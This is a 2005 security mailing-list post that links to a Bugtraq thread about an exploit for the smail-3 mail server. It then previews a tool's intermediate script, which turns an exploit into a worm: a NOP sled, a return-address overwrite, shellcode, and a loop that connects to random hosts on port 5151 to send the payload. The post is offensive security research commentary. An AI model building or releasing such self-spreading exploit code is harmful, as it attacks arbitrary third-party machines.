Dailydave mailing list archives
More stilton, but still pricey.
From: Dave Aitel <dave () immunitysec com>
Date: Sun, 25 Sep 2005 22:08:50 -0400
In case you missed it (as I did) here's Sean pulling an Apache Nosejob on the Greg, author of smail-3.
http://www.weird.com/~woods/projects/smail.html <--original project page
http://archives.neohapsis.com/archives/bugtraq/2005-03/0435.html (sean - you're owned!)
http://archives.neohapsis.com/archives/bugtraq/2005-03/0459.html (greg - no I'm not)
http://archives.neohapsis.com/archives/bugtraq/2005-03/0462.html (sean - yes you are: write4!)
http://archives.neohapsis.com/archives/bugtraq/2005-03/0474.html (sean - here's a sploit!)
Greg takes it in good spirit though, which is good to see. http://www.cheesesupply.com/ is apparently the place to buy cheese.
Does anyone else type in "Sans Dairy" into the googlebar instead of sans diary a lot? Maybe that's just me. But I'm never dissatisfied with the results!
In any case, here's a preview of the NIL (nematode intermediate language). You can generate this script simply by running ./nematode.py demosploit.py <--or any other exploit.
$ cat out.nem
nops 5000
stroverwrite %27%83%04%08 1036 <--this is just a return address
stroverwrite %CCtheshellcode 1044 <---this is actually a keyword for later
startloop
connect_random_host 5151
sendall
closesock
endloop

Then you can test it with ./neminterpret.py, which is also the launch script once you compiled the NIL into shellcode with nemx86shellcodegenerator.py. See? Complete cycle. Now all exploits are worms - and worms that you can build on the fly AND control with a level of reliability and trust.
-dave